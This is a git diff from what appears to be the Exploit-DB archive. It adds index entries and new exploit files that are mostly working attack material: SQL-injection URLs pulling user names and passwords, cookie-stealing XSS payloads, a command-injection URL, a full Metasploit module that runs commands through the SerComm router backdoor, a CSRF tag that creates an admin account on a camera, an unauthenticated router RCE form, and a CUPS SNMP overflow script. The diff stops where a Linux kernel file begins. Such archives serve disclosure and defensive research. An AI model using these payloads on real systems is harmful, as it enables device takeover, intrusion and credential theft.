diff --git a/files.csv b/files.csv
index 97c4095a9..3557ae6ae 100755
--- a/files.csv
+++ b/files.csv
@@ -27571,6 +27571,7 @@ id,file,description,date,author,platform,type,port
 30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
 30726,platforms/hardware/webapps/30726.2013-6922,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
 30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
+30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 GUI.PM Remote Code Injection Vulnerability",2007-10-31,"Duncan Gilmore",linux,remote,0
 30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0
 30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0
 30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 Index.PHP Local File Include Vulnerability",2007-11-01,KiNgOfThEwOrLd,php,webapps,0
@@ -27615,10 +27616,13 @@ id,file,description,date,author,platform,type,port 30770,platforms/cgi/webapps/30770.txt,"AIDA Web Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0 30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller Screens Directory HTML Injection Vulnerability",2007-11-15,"Jan Fry",multiple,remote,0 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0 +30773,platforms/windows/dos/30773.txt,"Microsoft Jet Database Engine MDB File Parsing Remote Buffer Overflow Vulnerability",2007-11-16,cocoruder,windows,dos,0 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script Cross-Site Scripting Vulnerability",2007-11-16,"Adrian Pastor",php,webapps,0 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 Login.ASP Multiple SQL Injection Vulnerabilities",2007-11-17,"Aria-Security Team",asp,webapps,0 +30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 ParseRTSPRequestString Remote Denial Of Service Vulnerability",2007-11-19,"Luigi Auriemma",linux,dos,0 30777,platforms/cgi/webapps/30777.txt,"Citrix NetScaler 8.0 build 47.8 Generic_API_Call.PL Cross-Site Scripting Vulnerability",2007-11-19,nnposter,cgi,webapps,0 30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0 +30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d Long Vehicle Name Buffer Overflow Vulnerability",2007-11-19,"Luigi Auriemma",multiple,dos,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0 30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0 30783,platforms/windows/local/30783.py,"CCProxy 7.3 - 
Integer Overflow Exploit",2014-01-07,Mr.XHat,windows,local,0 @@ -27627,6 +27631,7 @@ id,file,description,date,author,platform,type,port 30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 +30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 Multiple Remote Denial Of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0 30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection Vulnerability",2007-11-21,"Aria-Security Team",asp,webapps,0 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 'default.asp' SQL Injection Vulnerability",2007-11-21,The-0utl4w,asp,webapps,0 
@@ -27672,6 +27677,7 @@ id,file,description,date,author,platform,type,port
 30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0
 30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0
 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.PHP SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0
+30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0
 30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x,Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0
 30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 daemon_start Local Privilege Escalation Vulnerability",2007-12-03,"Bas van Schaik",linux,local,0
 30840,platforms/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 Remote Format String Vulnerability",2007-12-04,"SEC Consult",windows,dos,0
@@ -27684,11 +27690,13 @@ id,file,description,date,author,platform,type,port 30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0 30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 +30850,platforms/multiple/remote/30850.txt,"HFS HTTP File Server 2.2/2.3 Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0 30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0 30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0 30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 Clickstats.PHP Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0 30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 Multiple SQL Injection Vulnerabilities",2007-12-07,Chrysalid,asp,webapps,0 +30856,platforms/multiple/dos/30856.txt,"Easy File Sharing Web Server 1.3x Directory Traversal and Multiple Information Disclosure Vulnerabilities",2007-12-07,"Luigi Auriemma",multiple,dos,0 30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 usergallery.php galleryID Parameter XSS",2007-12-10,Brainhead,php,webapps,0 30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 calendar.php Multiple Parameter XSS",2007-12-10,Brainhead,php,webapps,0 30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 Access Validation And Input Validation Vulnerabilities",2007-12-10,"Tomas 
Kuliavas",php,webapps,0 
@@ -27715,3 +27723,50 @@ id,file,description,date,author,platform,type,port 30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 Unauthorized Post Access Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0 30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 Multiple Remote File Include Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 +30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 +30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0 +30895,platforms/linux/remote/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,remote,0 +30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0 +30897,platforms/windows/remote/30897.html,"iMesh 7 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0 +30898,platforms/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow Vulnerability",2007-11-06,wei_wang,linux,dos,0 +30899,platforms/php/webapps/30899.txt,"Mambo 4.6.2 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",php,webapps,0 +30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution Exploit",2014-01-14,"Arash Abedian",hardware,webapps,80 +30901,platforms/windows/remote/30901.txt,"Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote,0 
+30902,platforms/linux/dos/30902.c,"Linux Kernel 2.6.22 IPv6 Hop-By-Hop Header Remote Denial of Service Vulnerability",2007-12-19,"Clemens Kurtenbach",linux,dos,0 +30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow Vulnerability",2007-12-19,"Luigi Auriemma",multiple,dos,0 +30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x main.swf baseurl Parameter asfunction: Protocol Handler XSS",2007-12-18,"Rich Cannings",multiple,remote,0 +30906,platforms/multiple/dos/30906.c,"ProWizard 4 PC 1.62 Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",multiple,dos,0 +30908,platforms/windows/remote/30908.txt,"SoapUI 4.6.3 - Remote Code Execution",2014-01-14,"Barak Tawily",windows,remote,0 +30909,platforms/php/webapps/30909.html,"Auto Classifieds Script 2.0 - Add Admin CSRF Vulnerability",2014-01-14,"HackXBack ",php,webapps,80 +30910,platforms/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 +30911,platforms/php/webapps/30911.txt,"PHPJabbers Appointment Scheduler 2.0 - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 +30912,platforms/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 +30913,platforms/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80 +30914,platforms/hardware/webapps/30914.txt,"Conceptronic Wireless Pan & Tilt Network Camera - CSRF Vulnerability",2014-01-14,"Felipe Molina",hardware,webapps,80 +30915,platforms/hardware/remote/30915.rb,"SerComm Device Remote Code Execution",2014-01-14,metasploit,hardware,remote,32764 +30916,platforms/php/webapps/30916.txt,"Burden 1.8 - Authentication Bypass",2014-01-14,"High-Tech Bridge SA",php,webapps,80 +30917,platforms/php/webapps/30917.txt,"Horizon QCMS 4.0 - Multiple Vulnerabilities",2014-01-14,"High-Tech Bridge 
SA",php,webapps,80 +30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 'index.php' Local File Include Vulnerability",2007-12-20,JuMp-Er,php,webapps,0 +30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum 'dispatch.cgi' Tcl Command Injection Vulnerability",2007-12-20,niekt0,cgi,webapps,0 +30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0 +30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x 'view_entry.php' SQL Injection Vulnerability",2007-12-21,root@hanicker.it,php,webapps,0 +30922,platforms/multiple/dos/30922.c,"WinUAE 1.4.4 'zfile.c' Stack-Based Buffer Overflow Vulnerability",2007-12-21,"Luigi Auriemma",multiple,dos,0 +30923,platforms/php/webapps/30923.txt,"MyBlog 1.x Games.PHP ID Remote File Include Vulnerability",2007-12-22,"Beenu Arora",php,webapps,0 +30924,platforms/php/webapps/30924.txt,"Dokeos 1.x forum/viewthread.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 +30925,platforms/php/webapps/30925.txt,"Dokeos 1.x forum/viewforum.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 +30926,platforms/php/webapps/30926.txt,"Dokeos 1.x work/work.php display_upload_form Action origin Parameter XSS",2007-12-22,Doz,php,webapps,0 +30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 'loadadminpage' Parameter Remote File Include Vulnerability",2007-12-24,Koller,php,webapps,0 +30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0 +30929,platforms/php/webapps/30929.txt,"Logaholic update.php page Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 +30930,platforms/php/webapps/30930.txt,"Logaholic index.php parameter Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 +30931,platforms/php/webapps/30931.txt,"Logaholic index.php conf Parameter XSS",2007-12-24,malibu.r,php,webapps,0 
+30932,platforms/php/webapps/30932.txt,"Logaholic profiles.php newconfname Parameter XSS",2007-12-24,malibu.r,php,webapps,0 +30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 Crafted ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 +30935,platforms/hardware/remote/30935.txt,"ZyXEL P-330W Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0 +30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0 +30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 'com_option' Parameter Cross-Site Scripting Vulnerability",2007-12-25,"Omer Singer",php,webapps,0 +30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 'default.asp' Multiple SQL Injection Vulnerabilities",2007-12-24,bypass,asp,webapps,0 +30939,platforms/windows/remote/30939.txt,"ImgSvr 0.6.21 Error Message Remote Script Execution Vulnerability",2007-12-26,anonymous,windows,remote,0 +30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0 +30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0 +30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0 diff --git a/platforms/asp/webapps/30938.txt b/platforms/asp/webapps/30938.txt new file mode 100755 index 000000000..0f5abacba --- /dev/null +++ b/platforms/asp/webapps/30938.txt 
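Review bot: Five of the new rows (30909 through 30913) carry the author field as `"HackXBack "` with a trailing space inside the quotes, so anything that groups or searches by author will treat it as a different value from `HackXBack` should the same name appear without the space. Every other author in this hunk is either bare or quoted without padding, so this reads as a copy-paste artifact rather than intent. Suggest `2014-01-14,HackXBack,php,webapps,80` as the tail of each of those five rows.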
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27031/info + +Web Sihirbazi is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +These issues affect Web Sihirbazi 5.1.1; other versions may also be affected. + +http://www.example.com/[script_path]/default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user http://www.example.com/[script_path]/default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user \ No newline at end of file diff --git a/platforms/asp/webapps/30940.txt b/platforms/asp/webapps/30940.txt new file mode 100755 index 000000000..6d14e022d --- /dev/null +++ b/platforms/asp/webapps/30940.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/27044/info + +iPortalX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +All versions are considered vulnerable. + +http://www.example.com/forum/login_user.asp?Redirect=/forum/search.asp@KW=%22%3E%3 Cscript%3Ealert(document.cookie);%3C/script%3E + +http://www.example.com/forum/login_user.asp?Redirect=/members.asp?SF=%22%3E%3Cscri pt%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/30941.txt b/platforms/asp/webapps/30941.txt new file mode 100755 index 000000000..15db6ab80 --- /dev/null +++ b/platforms/asp/webapps/30941.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27044/info + +iPortalX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +All versions are considered vulnerable. + +http://www.example.com/Path/blogs.asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ea lert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/30919.txt b/platforms/cgi/webapps/30919.txt new file mode 100755 index 000000000..c8a6aeba1 --- /dev/null +++ b/platforms/cgi/webapps/30919.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/26963/info + +SiteScape Forum is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input. + +Attackers can exploit this issue to execute arbitrary commands in the context of the webserver process. Successful exploits could compromise the application and possibly the underlying system. + +http://www.example.com/forum/support/dispatch.cgi/0;command + diff --git a/platforms/hardware/remote/30915.rb b/platforms/hardware/remote/30915.rb new file mode 100755 index 000000000..6ff09eea0 --- /dev/null +++ b/platforms/hardware/remote/30915.rb 
@@ -0,0 +1,121 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStagerEcho + + def initialize(info={}) + super(update_info(info, + 'Name' => "SerComm Device Remote Code Execution", + 'Description' => %q{ + This module will cause remote code execution on several SerComm devices. + These devices typically include routers from NetGear and Linksys. + Tested against NetGear DG834. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Eloi Vanderbeken ', # Initial discovery, poc + 'Matt "hostess" Andreko ' # Msf module + ], + 'Payload' => + { + 'Space' => 10000, # Could be more, but this should be good enough + 'DisableNops' => true + }, + 'Platform' => 'linux', + 'Privileged' => false, + 'Targets' => + [ + ['Linux MIPS Big Endian', + { + 'Arch' => ARCH_MIPSBE + } + ], + ['Linux MIPS Little Endian', + { + 'Arch' => ARCH_MIPSLE + } + ], + ], + 'DefaultTarget' => 0, + 'References' => + [ + [ 'OSVDB', '101653' ], + [ 'URL', 'https://github.com/elvanderb/TCP-32764' ] + ], + 'DisclosureDate' => "Dec 31 2013" )) + + register_options( + [ + Opt::RPORT(32764) + ], self.class) + end + + def check + fprint = endian_fingerprint + + case fprint + when 'BE' + print_status("Detected Big Endian") + return Msf::Exploit::CheckCode::Vulnerable + when 'LE' + print_status("Detected Little Endian") + return Msf::Exploit::CheckCode::Vulnerable + end + + return Msf::Exploit::CheckCode::Unknown + end + + def exploit + execute_cmdstager(:noargs => true) + end + + def endian_fingerprint + begin + connect + + sock.put(rand_text(5)) + res = sock.get_once + + disconnect + + if res && res.start_with?("MMcS") + return 'BE' + elsif res && res.start_with?("ScMM") + return 'LE' + end + rescue Rex::ConnectionError => e + print_error("Connection failed: 
#{e.class}: #{e}") + end + + return nil + end + + def execute_command(cmd, opts) + vprint_debug(cmd) + + # Get the length of the command, for the backdoor's command injection + cmd_length = cmd.length + + # 0x53634d4d => Backdoor code + # 0x07 => Exec command + # cmd_length => Length of command to execute, sent after communication struct + data = [0x53634d4d, 0x07, cmd_length].pack("VVV") + + connect + # Send command structure followed by command text + sock.put(data+cmd) + disconnect + + Rex.sleep(1) + end + +end \ No newline at end of file diff --git a/platforms/hardware/remote/30935.txt b/platforms/hardware/remote/30935.txt new file mode 100755 index 000000000..3cfe1c244 --- /dev/null +++ b/platforms/hardware/remote/30935.txt @@ -0,0 +1,27 @@ +source: http://www.securityfocus.com/bid/27024/info + +ZyXEL P-330W 802.11g Secure Wireless Internet Sharing Router is prone to multiple cross-site scripting vulnerabilities and cross-site request-forgery vulnerabilities because it fails to properly sanitize user-supplied input. These issues affect the device's web-based administrative interface. + +An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +The attacker may leverage the cross-site request-forgery issues to perform actions in the context of a device administrator, which can compromise the device. + +http://www.example.com:/ping.asp?pingstr=â?> + +The following cross-site request-forgery example was provided: + +Chirstmastime is Here + + + + \ No newline at end of file diff --git a/platforms/hardware/webapps/30900.html b/platforms/hardware/webapps/30900.html new file mode 100755 index 000000000..bccafe1b1 --- /dev/null +++ b/platforms/hardware/webapps/30900.html 
@@ -0,0 +1,27 @@ +# Exploit Title: [Feixun FWR-604H Wireless Router Remote Code Execution] +# Date: [2014-01-09] +# Exploit Author: [Arash Abedian +(http://www.exploit-db.com/author/?a=6187 +) +# Vendor Homepage: [http://feixun.com.cn] +# Version: [Hardware Version 1.0, Firmware Build: 7642] +# Tested on: [Hardware Version 1.0, Firmware Build: 7642] +# Vulnerability Details: +Feixun FWR-604H 150Mbps Wireless N Router is vulnerable to Remote Code +Execution vulnerability(Hardware Version 1.0, Firmware Build: 7642, Vendor +website:feixun.com.cn). The web server don't authenticate user prior to +system level execution. As such an unauthenticated attacker can easily +remotely exploit the target using system_command parameter in diagnosis.asp +file. + + + +Exploit Feixun FWR-604H +
+ +Command: + + +
+ + \ No newline at end of file diff --git a/platforms/hardware/webapps/30914.txt b/platforms/hardware/webapps/30914.txt new file mode 100755 index 000000000..7a207a59d --- /dev/null +++ b/platforms/hardware/webapps/30914.txt 
@@ -0,0 +1,71 @@ +**General Details** + +Affected Product: Conceptronic camera CIPCAMPTIWL +Tested Firmware: 21.37.2.49 +Tested Web UI Firmware: 0.61.4.18 +Assigned CVE: CVE-2013-7204 +CVSSv2 Base Score: 5.8 (AV:N/AC:M/AU:N/C:P/I:P/A:N) +Vulnerability Type: Cross-Site Request Forgery [CWE-352] +Solution Status: Not Fixed +Vendor Notification Timeline: + - 23/12/2013: Contacting with technical support through their web +form http://www.conceptronic.net/supcon.php?action=init + - 23/12/2013: Contacting with general information email addres +(info@conceptronic.net) to inform about the vulnerability and request +suitable security or technical contact to send the complete details of +the CSRF. + - 25/12/2013: Contacting with public twitter accounts +@conceptronic and @conceptronic_es to request suitable security or +technical contact to send the complete details of the CSRF. + - 28/12/2013: Recontacting the technical support. + - 28/12/2013: Recontacting general information address +info@conceptronic.net. + - 02/01/2014: Trying to conntact with security@conceptronic.net y +vulnerabilities@conceptronic.net but they are non existent addresses. + - 03/01/2014: Involve Inteco CERT in the notification proccess. + - 08/01/2014: Inteco confirms that there is still no response from +Conceptronic. + +None of the comunication atempts with the vendor received a response, +so I'm publishing the advisory to warn users and confirm the +vulnerability with you. + +**Vulnerabilitty details** + +The CSRF is present in the CGI formulary used to create and modify +users of the web interface of the camera (/set_users.cgi). This CSRF +would allow a malicious attacker to create users in the camera web +interface (including administrator users) if he is able to lure the +legitimate administrator of the camera to visit a web controlled by +the attacker. + +An example of the process to exploit this vulnerability: + +1- A webcam administrator is already logged in the camera web interface. 
+ +2- A malicious user knows it and send a link to this administrator +pointing to a web controlled by this attacker +(http://example.com/conceptronic_csrf.html). In this web, the attacker +placed an image with the following code: + + csrf image + +3- The webcam administrator visit the link. + +4- The page http://example.com/test_csrf.html tries to load the image +by making a GET request to the pointed URL, thus, making the +legitimate administrator to create a new user identified by "attacker" +and password "attacker". + +A video was uploaded to youtube showing this behaviour: + +https://www.youtube.com/watch?v=URXEe_VRc74 + +This issue can be fixed by adding an additional step to the user +creation CGI, either requesting the administrator password again +before creating/modifying any user or creating a hidden random token +for each form (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet) + +-- +Felipe Molina de la Torre \ No newline at end of file diff --git a/platforms/linux/dos/30776.txt b/platforms/linux/dos/30776.txt new file mode 100755 index 000000000..e27a0c9d6 --- /dev/null +++ b/platforms/linux/dos/30776.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26488/info + +LIVE555 Media Server is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. + +Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions. + +LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/30776.zip \ No newline at end of file diff --git a/platforms/linux/dos/30837.txt b/platforms/linux/dos/30837.txt new file mode 100755 index 000000000..72f8dcdb2 --- /dev/null +++ b/platforms/linux/dos/30837.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26666/info + +QEMU is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks when handling user-supplied input. + +Attackers can exploit this issue to cause denial-of-service conditions. Given the nature of the issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. + +QEMU 0.9.0 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/30837.rar \ No newline at end of file diff --git a/platforms/linux/dos/30898.pl b/platforms/linux/dos/30898.pl new file mode 100755 index 000000000..162d8aa2f --- /dev/null +++ b/platforms/linux/dos/30898.pl 
@@ -0,0 +1,50 @@ +source: http://www.securityfocus.com/bid/26917/info + +Common UNIX Printing System (CUPS) is prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. + +Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software. Failed exploit attempts will likely result in denial-of-service conditions. + +This issue affects CUPS 1.2 and 1.3, prior to 1.3.5; other versions may also be vulnerable. + +P0C: +=== +#!/usr/bin/perl +#if 0 +# backend_snmp_poc.pl write by wei_wang@mcafee.com +# 2007-11-06 +# +# snmp.c asn1_get_string integer overflow cups 1.3.4 +# +# packet->error = "No community name"; +# else if ((length = asn1_get_length(&bufptr, bufend)) == 0) +# packet->error = "Community name uses indefinite length"; +# else +# { +# asn1_get_string(&bufptr, bufend, length, packet->community, +# sizeof(packet->community)); +# +# if ((packet->request_type = asn1_get_type(&bufptr, bufend)) +# +#002a: 30 38 tag=0x30 len=0x38 +#002c: 02 01 00 version:1 (0) +#002f: 04 84 ff ff ff ff 69 63 community:public +#len is 0xffffffff +#endif + +my $payload ="\x30\x38\x02\x01\x00\x04\x84\xff\xff\xff\xff\x41\x41"; + +use strict; +my $PF_INET=2; +my $SOCK_DGRAM=2; +my $port=161; +my $proto=getprotobyname('udp'); +my $addres=pack('SnC4x8',$PF_INET,$port,0,0,0,0); +my ($Cmd); +socket(SOCKET,$PF_INET,$SOCK_DGRAM,$proto) or die "Can't build a socket"; +bind (SOCKET,$addres); +while(1) +{ + my $rip=recv (SOCKET,$Cmd,100,0); + send (SOCKET,$payload,0,$rip) or die "send false"; + print "$Cmd"; +} \ No newline at end of file diff --git a/platforms/linux/dos/30902.c b/platforms/linux/dos/30902.c new file mode 100755 index 000000000..0f3a9b164 --- /dev/null +++ b/platforms/linux/dos/30902.c 
